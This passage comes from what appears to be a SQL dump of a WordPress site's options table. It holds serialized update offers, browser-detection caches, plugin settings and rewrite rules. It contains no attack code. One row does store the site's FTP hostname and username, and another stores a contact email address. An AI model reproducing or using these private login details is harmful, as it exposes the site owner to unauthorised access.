";s:11:\"new_bundled\";s:71:\"https://downloads.wordpress.org/release/wordpress-4.5.2-new-bundled.zip\";s:7:\"partial\";b:0;s:8:\"rollback\";b:0;}s:7:\"current\";s:5:\"4.5.2\";s:7:\"version\";s:5:\"4.5.2\";s:11:\"php_version\";s:5:\"5.2.4\";s:13:\"mysql_version\";s:3:\"5.0\";s:11:\"new_bundled\";s:3:\"4.4\";s:15:\"partial_version\";s:0:\"\";}i:1;O:8:\"stdClass\":12:{s:8:\"response\";s:10:\"autoupdate\";s:8:\"download\";s:59:\"https://downloads.wordpress.org/release/wordpress-4.5.2.zip\";s:6:\"locale\";s:5:\"en_US\";s:8:\"packages\";O:8:\"stdClass\":5:{s:4:\"full\";s:59:\"https://downloads.wordpress.org/release/wordpress-4.5.2.zip\";s:10:\"no_content\";s:70:\"https://downloads.wordpress.org/release/wordpress-4.5.2-no-content.zip\";s:11:\"new_bundled\";s:71:\"https://downloads.wordpress.org/release/wordpress-4.5.2-new-bundled.zip\";s:7:\"partial\";b:0;s:8:\"rollback\";b:0;}s:7:\"current\";s:5:\"4.5.2\";s:7:\"version\";s:5:\"4.5.2\";s:11:\"php_version\";s:5:\"5.2.4\";s:13:\"mysql_version\";s:3:\"5.0\";s:11:\"new_bundled\";s:3:\"4.4\";s:15:\"partial_version\";s:0:\"\";s:13:\"support_email\";s:26:\"updatehelp42@wordpress.org\";s:9:\"new_files\";s:1:\"1\";}i:2;O:8:\"stdClass\":12:{s:8:\"response\";s:10:\"autoupdate\";s:8:\"download\";s:59:\"https://downloads.wordpress.org/release/wordpress-4.4.3.zip\";s:6:\"locale\";s:5:\"en_US\";s:8:\"packages\";O:8:\"stdClass\":5:{s:4:\"full\";s:59:\"https://downloads.wordpress.org/release/wordpress-4.4.3.zip\";s:10:\"no_content\";s:70:\"https://downloads.wordpress.org/release/wordpress-4.4.3-no-content.zip\";s:11:\"new_bundled\";s:71:\"https://downloads.wordpress.org/release/wordpress-4.4.3-new-bundled.zip\";s:7:\"partial\";b:0;s:8:\"rollback\";b:0;}s:7:\"current\";s:5:\"4.4.3\";s:7:\"version\";s:5:\"4.4.3\";s:11:\"php_version\";s:5:\"5.2.4\";s:13:\"mysql_version\";s:3:\"5.0\";s:11:\"new_bundled\";s:3:\"4.4\";s:15:\"partial_version\";s:0:\"\";s:13:\"support_email\";s:26:\"updatehelp42@wordpress.org\";s:9:\"new_files\";s:1:\"1\";}i:3;O:8:\"stdClass\":12:{s:8:\"response\";s:10:\"autoupdate\";s:8:\"download\";s:59:\"https://downloads.wordpress.org/release/wordpress-4.3.4.zip\";s:6:\"locale\";s:5:\"en_US\";s:8:\"packages\";O:8:\"stdClass\":5:{s:4:\"full\";s:59:\"https://downloads.wordpress.org/release/wordpress-4.3.4.zip\";s:10:\"no_content\";s:70:\"https://downloads.wordpress.org/release/wordpress-4.3.4-no-content.zip\";s:11:\"new_bundled\";s:71:\"https://downloads.wordpress.org/release/wordpress-4.3.4-new-bundled.zip\";s:7:\"partial\";b:0;s:8:\"rollback\";b:0;}s:7:\"current\";s:5:\"4.3.4\";s:7:\"version\";s:5:\"4.3.4\";s:11:\"php_version\";s:5:\"5.2.4\";s:13:\"mysql_version\";s:3:\"5.0\";s:11:\"new_bundled\";s:3:\"4.4\";s:15:\"partial_version\";s:0:\"\";s:13:\"support_email\";s:26:\"updatehelp42@wordpress.org\";s:9:\"new_files\";s:1:\"1\";}i:4;O:8:\"stdClass\":12:{s:8:\"response\";s:10:\"autoupdate\";s:8:\"download\";s:59:\"https://downloads.wordpress.org/release/wordpress-4.2.8.zip\";s:6:\"locale\";s:5:\"en_US\";s:8:\"packages\";O:8:\"stdClass\":5:{s:4:\"full\";s:59:\"https://downloads.wordpress.org/release/wordpress-4.2.8.zip\";s:10:\"no_content\";s:70:\"https://downloads.wordpress.org/release/wordpress-4.2.8-no-content.zip\";s:11:\"new_bundled\";s:71:\"https://downloads.wordpress.org/release/wordpress-4.2.8-new-bundled.zip\";s:7:\"partial\";b:0;s:8:\"rollback\";b:0;}s:7:\"current\";s:5:\"4.2.8\";s:7:\"version\";s:5:\"4.2.8\";s:11:\"php_version\";s:5:\"5.2.4\";s:13:\"mysql_version\";s:3:\"5.0\";s:11:\"new_bundled\";s:3:\"4.4\";s:15:\"partial_version\";s:0:\"\";s:13:\"support_email\";s:26:\"updatehelp42@wordpress.org\";s:9:\"new_files\";s:1:\"1\";}i:5;O:8:\"stdClass\":12:{s:8:\"response\";s:10:\"autoupdate\";s:8:\"download\";s:60:\"https://downloads.wordpress.org/release/wordpress-4.1.11.zip\";s:6:\"locale\";s:5:\"en_US\";s:8:\"packages\";O:8:\"stdClass\":5:{s:4:\"full\";s:60:\"https://downloads.wordpress.org/release/wordpress-4.1.11.zip\";s:10:\"no_content\";s:71:\"https://downloads.wordpress.org/release/wordpress-4.1.11-no-content.zip\";s:11:\"new_bundled\";s:72:\"https://downloads.wordpress.org/release/wordpress-4.1.11-new-bundled.zip\";s:7:\"partial\";s:70:\"https://downloads.wordpress.org/release/wordpress-4.1.11-partial-8.zip\";s:8:\"rollback\";s:71:\"https://downloads.wordpress.org/release/wordpress-4.1.11-rollback-8.zip\";}s:7:\"current\";s:6:\"4.1.11\";s:7:\"version\";s:6:\"4.1.11\";s:11:\"php_version\";s:5:\"5.2.4\";s:13:\"mysql_version\";s:3:\"5.0\";s:11:\"new_bundled\";s:3:\"4.4\";s:15:\"partial_version\";s:5:\"4.1.8\";s:13:\"support_email\";s:26:\"updatehelp42@wordpress.org\";s:9:\"new_files\";s:0:\"\";}}s:12:\"last_checked\";i:1463130989;s:15:\"version_checked\";s:5:\"4.1.8\";s:12:\"translations\";a:0:{}}','yes'),(4364,'_site_transient_timeout_browser_c5dcbefd1064d750168630247ba3d4dc','1446758050','yes'),(4365,'_site_transient_browser_c5dcbefd1064d750168630247ba3d4dc','a:9:{s:8:\"platform\";s:7:\"Windows\";s:4:\"name\";s:6:\"Chrome\";s:7:\"version\";s:12:\"46.0.2490.80\";s:10:\"update_url\";s:28:\"http://www.google.com/chrome\";s:7:\"img_src\";s:49:\"http://s.wordpress.org/images/browsers/chrome.png\";s:11:\"img_src_ssl\";s:48:\"https://wordpress.org/images/browsers/chrome.png\";s:15:\"current_version\";s:2:\"18\";s:7:\"upgrade\";b:0;s:8:\"insecure\";b:0;}','yes'),(4593,'_site_transient_timeout_browser_da5e40b3fdc6973489e1c723652734f9','1447705082','yes'),(4594,'_site_transient_browser_da5e40b3fdc6973489e1c723652734f9','a:9:{s:8:\"platform\";s:7:\"Windows\";s:4:\"name\";s:6:\"Chrome\";s:7:\"version\";s:12:\"46.0.2490.80\";s:10:\"update_url\";s:28:\"http://www.google.com/chrome\";s:7:\"img_src\";s:49:\"http://s.wordpress.org/images/browsers/chrome.png\";s:11:\"img_src_ssl\";s:48:\"https://wordpress.org/images/browsers/chrome.png\";s:15:\"current_version\";s:2:\"18\";s:7:\"upgrade\";b:0;s:8:\"insecure\";b:0;}','yes'),(4619,'wpgmza_xml_location','{uploads_dir}/wp-google-maps/','yes'),(4620,'wpgmza_xml_url','{uploads_url}/wp-google-maps/','yes'),(4621,'wpgmza_db_version','6.3.02','yes'),(4622,'wpgmaps_current_version','6.3.02','yes'),(4623,'WPGMZA_OTHER_SETTINGS','a:1:{s:27:\"wpgmza_settings_marker_pull\";s:1:\"0\";}','yes'),(4624,'WPGMZA_FIRST_TIME','6.3.02','yes'),(4625,'wpgmza_stats','a:1:{s:14:\"settings_basic\";a:3:{s:5:\"views\";i:1;s:13:\"last_accessed\";s:19:\"2015-11-09 21:04:12\";s:14:\"first_accessed\";s:19:\"2015-11-09 21:04:12\";}}','yes'),(4632,'_site_transient_timeout_browser_3e236b20ec78fe3b7960c0638e68fd55','1447709306','yes'),(4633,'_site_transient_browser_3e236b20ec78fe3b7960c0638e68fd55','a:9:{s:8:\"platform\";s:9:\"Macintosh\";s:4:\"name\";s:6:\"Safari\";s:7:\"version\";s:3:\"9.0\";s:10:\"update_url\";s:28:\"http://www.apple.com/safari/\";s:7:\"img_src\";s:49:\"http://s.wordpress.org/images/browsers/safari.png\";s:11:\"img_src_ssl\";s:48:\"https://wordpress.org/images/browsers/safari.png\";s:15:\"current_version\";s:1:\"5\";s:7:\"upgrade\";b:0;s:8:\"insecure\";b:0;}','yes'),(4647,'_site_transient_timeout_browser_e3dab7b5c20e78a0cdf09cc1f8481a4b','1447783110','yes'),(4648,'_site_transient_browser_e3dab7b5c20e78a0cdf09cc1f8481a4b','a:9:{s:8:\"platform\";s:7:\"Windows\";s:4:\"name\";s:6:\"Chrome\";s:7:\"version\";s:12:\"46.0.2490.80\";s:10:\"update_url\";s:28:\"http://www.google.com/chrome\";s:7:\"img_src\";s:49:\"http://s.wordpress.org/images/browsers/chrome.png\";s:11:\"img_src_ssl\";s:48:\"https://wordpress.org/images/browsers/chrome.png\";s:15:\"current_version\";s:2:\"18\";s:7:\"upgrade\";b:0;s:8:\"insecure\";b:0;}','yes'),(4678,'_site_transient_timeout_browser_269c24786ee1f3aa8420f365c26f0e67','1447797125','yes'),(4679,'_site_transient_browser_269c24786ee1f3aa8420f365c26f0e67','a:9:{s:8:\"platform\";s:7:\"Windows\";s:4:\"name\";s:6:\"Chrome\";s:7:\"version\";s:12:\"46.0.2490.80\";s:10:\"update_url\";s:28:\"http://www.google.com/chrome\";s:7:\"img_src\";s:49:\"http://s.wordpress.org/images/browsers/chrome.png\";s:11:\"img_src_ssl\";s:48:\"https://wordpress.org/images/browsers/chrome.png\";s:15:\"current_version\";s:2:\"18\";s:7:\"upgrade\";b:0;s:8:\"insecure\";b:0;}','yes'),(4686,'_site_transient_timeout_browser_71e9d81c5317fe08cbeebb649a300dff','1447869116','yes'),(4687,'_site_transient_browser_71e9d81c5317fe08cbeebb649a300dff','a:9:{s:8:\"platform\";s:7:\"Windows\";s:4:\"name\";s:6:\"Chrome\";s:7:\"version\";s:12:\"46.0.2490.80\";s:10:\"update_url\";s:28:\"http://www.google.com/chrome\";s:7:\"img_src\";s:49:\"http://s.wordpress.org/images/browsers/chrome.png\";s:11:\"img_src_ssl\";s:48:\"https://wordpress.org/images/browsers/chrome.png\";s:15:\"current_version\";s:2:\"18\";s:7:\"upgrade\";b:0;s:8:\"insecure\";b:0;}','yes'),(4874,'_site_transient_timeout_browser_6baf0cc1025c43fb6b5e5d0255f4549a','1449005356','yes'),(4875,'_site_transient_browser_6baf0cc1025c43fb6b5e5d0255f4549a','a:9:{s:8:\"platform\";s:9:\"Macintosh\";s:4:\"name\";s:6:\"Safari\";s:7:\"version\";s:5:\"9.0.1\";s:10:\"update_url\";s:28:\"http://www.apple.com/safari/\";s:7:\"img_src\";s:49:\"http://s.wordpress.org/images/browsers/safari.png\";s:11:\"img_src_ssl\";s:48:\"https://wordpress.org/images/browsers/safari.png\";s:15:\"current_version\";s:1:\"5\";s:7:\"upgrade\";b:0;s:8:\"insecure\";b:0;}','yes'),(4901,'_site_transient_timeout_browser_4910e34ab899e1f04ce17d9586e216ff','1449684832','yes'),(4902,'_site_transient_browser_4910e34ab899e1f04ce17d9586e216ff','a:9:{s:8:\"platform\";s:7:\"Windows\";s:4:\"name\";s:6:\"Chrome\";s:7:\"version\";s:12:\"46.0.2490.86\";s:10:\"update_url\";s:28:\"http://www.google.com/chrome\";s:7:\"img_src\";s:49:\"http://s.wordpress.org/images/browsers/chrome.png\";s:11:\"img_src_ssl\";s:48:\"https://wordpress.org/images/browsers/chrome.png\";s:15:\"current_version\";s:2:\"18\";s:7:\"upgrade\";b:0;s:8:\"insecure\";b:0;}','yes'),(4986,'_site_transient_timeout_browser_f78c7e340d72eb1bd7643317460df670','1450127262','yes'),(4987,'_site_transient_browser_f78c7e340d72eb1bd7643317460df670','a:9:{s:8:\"platform\";s:7:\"Windows\";s:4:\"name\";s:6:\"Chrome\";s:7:\"version\";s:12:\"47.0.2526.73\";s:10:\"update_url\";s:28:\"http://www.google.com/chrome\";s:7:\"img_src\";s:49:\"http://s.wordpress.org/images/browsers/chrome.png\";s:11:\"img_src_ssl\";s:48:\"https://wordpress.org/images/browsers/chrome.png\";s:15:\"current_version\";s:2:\"18\";s:7:\"upgrade\";b:0;s:8:\"insecure\";b:0;}','yes'),(5040,'_site_transient_timeout_browser_0aea016c3c68752f4cfa39e074586ed3','1450281693','yes'),(5041,'_site_transient_browser_0aea016c3c68752f4cfa39e074586ed3','a:9:{s:8:\"platform\";s:7:\"Windows\";s:4:\"name\";s:6:\"Chrome\";s:7:\"version\";s:12:\"47.0.2526.80\";s:10:\"update_url\";s:28:\"http://www.google.com/chrome\";s:7:\"img_src\";s:49:\"http://s.wordpress.org/images/browsers/chrome.png\";s:11:\"img_src_ssl\";s:48:\"https://wordpress.org/images/browsers/chrome.png\";s:15:\"current_version\";s:2:\"18\";s:7:\"upgrade\";b:0;s:8:\"insecure\";b:0;}','yes'),(5061,'_site_transient_timeout_popular_importers_en_US','1449850312','yes'),(5062,'_site_transient_popular_importers_en_US','a:2:{s:9:\"importers\";a:8:{s:7:\"blogger\";a:4:{s:4:\"name\";s:7:\"Blogger\";s:11:\"description\";s:86:\"Install the Blogger importer to import posts, comments, and users from a Blogger blog.\";s:11:\"plugin-slug\";s:16:\"blogger-importer\";s:11:\"importer-id\";s:7:\"blogger\";}s:9:\"wpcat2tag\";a:4:{s:4:\"name\";s:29:\"Categories and Tags Converter\";s:11:\"description\";s:109:\"Install the category/tag converter to convert existing categories to tags or tags to categories, selectively.\";s:11:\"plugin-slug\";s:18:\"wpcat2tag-importer\";s:11:\"importer-id\";s:9:\"wpcat2tag\";}s:11:\"livejournal\";a:4:{s:4:\"name\";s:11:\"LiveJournal\";s:11:\"description\";s:82:\"Install the LiveJournal importer to import posts from LiveJournal using their API.\";s:11:\"plugin-slug\";s:20:\"livejournal-importer\";s:11:\"importer-id\";s:11:\"livejournal\";}s:11:\"movabletype\";a:4:{s:4:\"name\";s:24:\"Movable Type and TypePad\";s:11:\"description\";s:99:\"Install the Movable Type importer to import posts and comments from a Movable Type or TypePad blog.\";s:11:\"plugin-slug\";s:20:\"movabletype-importer\";s:11:\"importer-id\";s:2:\"mt\";}s:4:\"opml\";a:4:{s:4:\"name\";s:8:\"Blogroll\";s:11:\"description\";s:61:\"Install the blogroll importer to import links in OPML format.\";s:11:\"plugin-slug\";s:13:\"opml-importer\";s:11:\"importer-id\";s:4:\"opml\";}s:3:\"rss\";a:4:{s:4:\"name\";s:3:\"RSS\";s:11:\"description\";s:58:\"Install the RSS importer to import posts from an RSS feed.\";s:11:\"plugin-slug\";s:12:\"rss-importer\";s:11:\"importer-id\";s:3:\"rss\";}s:6:\"tumblr\";a:4:{s:4:\"name\";s:6:\"Tumblr\";s:11:\"description\";s:84:\"Install the Tumblr importer to import posts & media from Tumblr using their API.\";s:11:\"plugin-slug\";s:15:\"tumblr-importer\";s:11:\"importer-id\";s:6:\"tumblr\";}s:9:\"wordpress\";a:4:{s:4:\"name\";s:9:\"WordPress\";s:11:\"description\";s:130:\"Install the WordPress importer to import posts, pages, comments, custom fields, categories, and tags from a WordPress export file.\";s:11:\"plugin-slug\";s:18:\"wordpress-importer\";s:11:\"importer-id\";s:9:\"wordpress\";}}s:10:\"translated\";b:0;}','yes'),(5102,'_site_transient_timeout_browser_38a27b0ee5967eeef43ca57b86a1b572','1450383295','yes'),(5103,'_site_transient_browser_38a27b0ee5967eeef43ca57b86a1b572','a:9:{s:8:\"platform\";s:7:\"Windows\";s:4:\"name\";s:6:\"Chrome\";s:7:\"version\";s:12:\"47.0.2526.80\";s:10:\"update_url\";s:28:\"http://www.google.com/chrome\";s:7:\"img_src\";s:49:\"http://s.wordpress.org/images/browsers/chrome.png\";s:11:\"img_src_ssl\";s:48:\"https://wordpress.org/images/browsers/chrome.png\";s:15:\"current_version\";s:2:\"18\";s:7:\"upgrade\";b:0;s:8:\"insecure\";b:0;}','yes'),(5122,'_site_transient_timeout_browser_a41d5866f60ceaef11941c410c127544','1450428612','yes'),(5123,'_site_transient_browser_a41d5866f60ceaef11941c410c127544','a:9:{s:8:\"platform\";s:7:\"Windows\";s:4:\"name\";s:6:\"Chrome\";s:7:\"version\";s:12:\"47.0.2526.80\";s:10:\"update_url\";s:28:\"http://www.google.com/chrome\";s:7:\"img_src\";s:49:\"http://s.wordpress.org/images/browsers/chrome.png\";s:11:\"img_src_ssl\";s:48:\"https://wordpress.org/images/browsers/chrome.png\";s:15:\"current_version\";s:2:\"18\";s:7:\"upgrade\";b:0;s:8:\"insecure\";b:0;}','yes'),(5153,'wpmembers_email_wpfrom','Cheskel@empireins.com','yes'),(5154,'wpmembers_email_wpname','Member mail','yes'),(5182,'_site_transient_timeout_browser_3e405d0ef0dac143010dc35b97c0f98f','1450549073','yes'),(5183,'_site_transient_browser_3e405d0ef0dac143010dc35b97c0f98f','a:9:{s:8:\"platform\";s:7:\"Windows\";s:4:\"name\";s:6:\"Chrome\";s:7:\"version\";s:12:\"47.0.2526.80\";s:10:\"update_url\";s:28:\"http://www.google.com/chrome\";s:7:\"img_src\";s:49:\"http://s.wordpress.org/images/browsers/chrome.png\";s:11:\"img_src_ssl\";s:48:\"https://wordpress.org/images/browsers/chrome.png\";s:15:\"current_version\";s:2:\"18\";s:7:\"upgrade\";b:0;s:8:\"insecure\";b:0;}','yes'),(5433,'_site_transient_timeout_browser_b8aef364724309cfd89a90dd6db799fc','1451502939','yes'),(5434,'_site_transient_browser_b8aef364724309cfd89a90dd6db799fc','a:9:{s:8:\"platform\";s:7:\"Windows\";s:4:\"name\";s:6:\"Chrome\";s:7:\"version\";s:13:\"47.0.2526.106\";s:10:\"update_url\";s:28:\"http://www.google.com/chrome\";s:7:\"img_src\";s:49:\"http://s.wordpress.org/images/browsers/chrome.png\";s:11:\"img_src_ssl\";s:48:\"https://wordpress.org/images/browsers/chrome.png\";s:15:\"current_version\";s:2:\"18\";s:7:\"upgrade\";b:0;s:8:\"insecure\";b:0;}','yes'),(6122,'_site_transient_timeout_browser_15297098b1b9a9d1d3687dc973a31662','1452526570','yes'),(6125,'_site_transient_browser_15297098b1b9a9d1d3687dc973a31662','a:9:{s:8:\"platform\";s:7:\"Windows\";s:4:\"name\";s:6:\"Chrome\";s:7:\"version\";s:13:\"47.0.2526.106\";s:10:\"update_url\";s:28:\"http://www.google.com/chrome\";s:7:\"img_src\";s:49:\"http://s.wordpress.org/images/browsers/chrome.png\";s:11:\"img_src_ssl\";s:48:\"https://wordpress.org/images/browsers/chrome.png\";s:15:\"current_version\";s:2:\"18\";s:7:\"upgrade\";b:0;s:8:\"insecure\";b:0;}','yes'),(6597,'_site_transient_timeout_browser_588cd3d148ebe4893296a691ac9f6989','1452718284','yes'),(6600,'_site_transient_browser_588cd3d148ebe4893296a691ac9f6989','a:9:{s:8:\"platform\";s:7:\"Windows\";s:4:\"name\";s:6:\"Chrome\";s:7:\"version\";s:13:\"47.0.2526.106\";s:10:\"update_url\";s:28:\"http://www.google.com/chrome\";s:7:\"img_src\";s:49:\"http://s.wordpress.org/images/browsers/chrome.png\";s:11:\"img_src_ssl\";s:48:\"https://wordpress.org/images/browsers/chrome.png\";s:15:\"current_version\";s:2:\"18\";s:7:\"upgrade\";b:0;s:8:\"insecure\";b:0;}','yes'),(7066,'_site_transient_timeout_browser_9780da594b041fdfbb063237399fabda','1453138274','yes'),(7069,'_site_transient_browser_9780da594b041fdfbb063237399fabda','a:9:{s:8:\"platform\";s:7:\"Windows\";s:4:\"name\";s:7:\"Firefox\";s:7:\"version\";s:4:\"43.0\";s:10:\"update_url\";s:23:\"http://www.firefox.com/\";s:7:\"img_src\";s:50:\"http://s.wordpress.org/images/browsers/firefox.png\";s:11:\"img_src_ssl\";s:49:\"https://wordpress.org/images/browsers/firefox.png\";s:15:\"current_version\";s:2:\"16\";s:7:\"upgrade\";b:0;s:8:\"insecure\";b:0;}','yes'),(7347,'_site_transient_timeout_browser_72ccb266eb9276f497ef7e8eaecdaec0','1453379527','yes'),(7350,'_site_transient_browser_72ccb266eb9276f497ef7e8eaecdaec0','a:9:{s:8:\"platform\";s:7:\"Windows\";s:4:\"name\";s:6:\"Chrome\";s:7:\"version\";s:13:\"47.0.2526.106\";s:10:\"update_url\";s:28:\"http://www.google.com/chrome\";s:7:\"img_src\";s:49:\"http://s.wordpress.org/images/browsers/chrome.png\";s:11:\"img_src_ssl\";s:48:\"https://wordpress.org/images/browsers/chrome.png\";s:15:\"current_version\";s:2:\"18\";s:7:\"upgrade\";b:0;s:8:\"insecure\";b:0;}','yes'),(7819,'_site_transient_timeout_browser_f72f1f15c4765f88151345a62f8fd7f7','1453801545','yes'),(7822,'_site_transient_browser_f72f1f15c4765f88151345a62f8fd7f7','a:9:{s:8:\"platform\";s:7:\"Windows\";s:4:\"name\";s:6:\"Chrome\";s:7:\"version\";s:13:\"47.0.2526.111\";s:10:\"update_url\";s:28:\"http://www.google.com/chrome\";s:7:\"img_src\";s:49:\"http://s.wordpress.org/images/browsers/chrome.png\";s:11:\"img_src_ssl\";s:48:\"https://wordpress.org/images/browsers/chrome.png\";s:15:\"current_version\";s:2:\"18\";s:7:\"upgrade\";b:0;s:8:\"insecure\";b:0;}','yes'),(7885,'ftp_credentials','a:3:{s:8:\"hostname\";s:13:\"empireins.com\";s:8:\"username\";s:14:\"dev_8109085491\";s:15:\"connection_type\";s:3:\"ftp\";}','yes'),(7902,'gravityformsaddon_gravityformswebapi_version','1.0','yes'),(7905,'gform_pending_installation','1','yes'),(7908,'gform_enable_background_updates','1','yes'),(7911,'gform_longtext_ready','1','yes'),(7914,'rg_form_version','1.9.14','yes'),(7917,'_transient_timeout_gform_update_info','1453287334','no'),(7920,'_transient_gform_update_info','a:5:{s:7:\"headers\";a:8:{s:4:\"date\";s:29:\"Tue, 19 Jan 2016 10:55:34 GMT\";s:6:\"server\";s:12:\"Apache/2.4.7\";s:12:\"x-powered-by\";s:21:\"PHP/5.5.9-1ubuntu4.14\";s:4:\"vary\";s:15:\"Accept-Encoding\";s:16:\"content-encoding\";s:4:\"gzip\";s:14:\"content-length\";s:2:\"96\";s:10:\"connection\";s:5:\"close\";s:12:\"content-type\";s:9:\"text/html\";}s:4:\"body\";s:82:\"{\"is_valid_key\":\"0\",\"expiration_time\":0,\"version\":\"1.7.9\",\"url\":\"\",\"offerings\":[]}\";s:8:\"response\";a:2:{s:4:\"code\";i:200;s:7:\"message\";s:2:\"OK\";}s:7:\"cookies\";a:0:{}s:8:\"filename\";N;}','no'),(8068,'rewrite_rules','a:141:{s:14:\"Testimonial/?$\";s:32:\"index.php?post_type=testimonials\";s:44:\"Testimonial/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?post_type=testimonials&feed=$matches[1]\";s:39:\"Testimonial/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?post_type=testimonials&feed=$matches[1]\";s:31:\"Testimonial/page/([0-9]{1,})/?$\";s:50:\"index.php?post_type=testimonials&paged=$matches[1]\";s:13:\"team-ember/?$\";s:27:\"index.php?post_type=clients\";s:43:\"team-ember/feed/(feed|rdf|rss|rss2|atom)/?$\";s:44:\"index.php?post_type=clients&feed=$matches[1]\";s:38:\"team-ember/(feed|rdf|rss|rss2|atom)/?$\";s:44:\"index.php?post_type=clients&feed=$matches[1]\";s:30:\"team-ember/page/([0-9]{1,})/?$\";s:45:\"index.php?post_type=clients&paged=$matches[1]\";s:47:\"category/(.+?)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:52:\"index.php?category_name=$matches[1]&feed=$matches[2]\";s:42:\"category/(.+?)/(feed|rdf|rss|rss2|atom)/?$\";s:52:\"index.php?category_name=$matches[1]&feed=$matches[2]\";s:35:\"category/(.+?)/page/?([0-9]{1,})/?$\";s:53:\"index.php?category_name=$matches[1]&paged=$matches[2]\";s:17:\"category/(.+?)/?$\";s:35:\"index.php?category_name=$matches[1]\";s:44:\"tag/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:42:\"index.php?tag=$matches[1]&feed=$matches[2]\";s:39:\"tag/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:42:\"index.php?tag=$matches[1]&feed=$matches[2]\";s:32:\"tag/([^/]+)/page/?([0-9]{1,})/?$\";s:43:\"index.php?tag=$matches[1]&paged=$matches[2]\";s:14:\"tag/([^/]+)/?$\";s:25:\"index.php?tag=$matches[1]\";s:45:\"type/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?post_format=$matches[1]&feed=$matches[2]\";s:40:\"type/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?post_format=$matches[1]&feed=$matches[2]\";s:33:\"type/([^/]+)/page/?([0-9]{1,})/?$\";s:51:\"index.php?post_format=$matches[1]&paged=$matches[2]\";s:15:\"type/([^/]+)/?$\";s:33:\"index.php?post_format=$matches[1]\";s:45:\"team/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:43:\"index.php?team=$matches[1]&feed=$matches[2]\";s:40:\"team/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:43:\"index.php?team=$matches[1]&feed=$matches[2]\";s:33:\"team/([^/]+)/page/?([0-9]{1,})/?$\";s:44:\"index.php?team=$matches[1]&paged=$matches[2]\";s:15:\"team/([^/]+)/?$\";s:26:\"index.php?team=$matches[1]\";s:39:\"Testimonial/[^/]+/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:49:\"Testimonial/[^/]+/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:69:\"Testimonial/[^/]+/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:64:\"Testimonial/[^/]+/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:64:\"Testimonial/[^/]+/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:32:\"Testimonial/([^/]+)/trackback/?$\";s:39:\"index.php?testimonials=$matches[1]&tb=1\";s:52:\"Testimonial/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:51:\"index.php?testimonials=$matches[1]&feed=$matches[2]\";s:47:\"Testimonial/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:51:\"index.php?testimonials=$matches[1]&feed=$matches[2]\";s:40:\"Testimonial/([^/]+)/page/?([0-9]{1,})/?$\";s:52:\"index.php?testimonials=$matches[1]&paged=$matches[2]\";s:47:\"Testimonial/([^/]+)/comment-page-([0-9]{1,})/?$\";s:52:\"index.php?testimonials=$matches[1]&cpage=$matches[2]\";s:32:\"Testimonial/([^/]+)(/[0-9]+)?/?$\";s:51:\"index.php?testimonials=$matches[1]&page=$matches[2]\";s:28:\"Testimonial/[^/]+/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:38:\"Testimonial/[^/]+/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:58:\"Testimonial/[^/]+/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:53:\"Testimonial/[^/]+/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:53:\"Testimonial/[^/]+/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:38:\"team-ember/[^/]+/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:48:\"team-ember/[^/]+/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:68:\"team-ember/[^/]+/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:63:\"team-ember/[^/]+/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:63:\"team-ember/[^/]+/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:31:\"team-ember/([^/]+)/trackback/?$\";s:34:\"index.php?clients=$matches[1]&tb=1\";s:51:\"team-ember/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:46:\"index.php?clients=$matches[1]&feed=$matches[2]\";s:46:\"team-ember/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:46:\"index.php?clients=$matches[1]&feed=$matches[2]\";s:39:\"team-ember/([^/]+)/page/?([0-9]{1,})/?$\";s:47:\"index.php?clients=$matches[1]&paged=$matches[2]\";s:46:\"team-ember/([^/]+)/comment-page-([0-9]{1,})/?$\";s:47:\"index.php?clients=$matches[1]&cpage=$matches[2]\";s:31:\"team-ember/([^/]+)(/[0-9]+)?/?$\";s:46:\"index.php?clients=$matches[1]&page=$matches[2]\";s:27:\"team-ember/[^/]+/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:37:\"team-ember/[^/]+/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:57:\"team-ember/[^/]+/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:52:\"team-ember/[^/]+/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:52:\"team-ember/[^/]+/([^/]+)/comment-page-([0-9]{1,